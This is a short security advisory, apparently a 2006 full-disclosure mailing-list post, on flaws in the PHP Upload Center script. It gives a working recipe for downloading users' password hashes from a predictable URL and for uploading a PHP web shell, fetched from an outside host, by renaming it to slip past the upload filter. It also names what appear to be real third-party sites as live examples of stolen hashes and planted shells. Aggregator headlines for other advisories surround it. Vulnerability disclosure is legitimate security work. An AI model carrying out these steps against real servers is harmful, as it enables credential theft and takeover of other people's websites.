Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) AZTEK forums 4.0 multiple vulnerabilities (PoC) [SA19096] Aztek Forum Message Body Script Insertion Vulnerability [SA19084] VUBB "pass" SQL Injection Vulnerability [Full-disclosure] FusionPHP Multiple Vulnerabilities From::) :) <liz0_(at)_bsdmail.com> Date:03.03.2006Subject:PHP Upload Center Download users password hashes And phpshell UploadPHP Upload Center Download users password hashes And phpshell Upload Site:http://ksv.hypermart.net/php/ ---------------------------------------------------- 1)Download users password hashes: http://victim.com/path/users/username 2)phpshell Upload Example: Download http://geocities.ocm/liz0zim/shell.php And shell.php Save As shell.php.li And Upload Web Sİte http://victim.com/path/files/shell.php.li ---------------------------------------------------- 1) Download users password hashes Example: http://www.sattv.ru/upload/users/Admin 2)Upload PhpShell Example: http://ha.bums.dk/upload/files/liz0.php.li ----------------------------------------------------- Credit :Liz0ziM Website:www.biyosecurity.com Mail :liz0@bsdmail.com ------------------------------------------------------ Source: http://www.blogcu.com/Liz0ziM/317250/ http://biyosecurity.be/bugs/phpuploadcenter2.txt -- _______________________________________________ Get your free email from http://mymail.bsdmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
AZTEK forums 4.0 multiple vulnerabilities (PoC)
[SA19096] Aztek Forum Message Body Script Insertion Vulnerability
[SA19084] VUBB "pass" SQL Injection Vulnerability
[Full-disclosure] FusionPHP Multiple Vulnerabilities
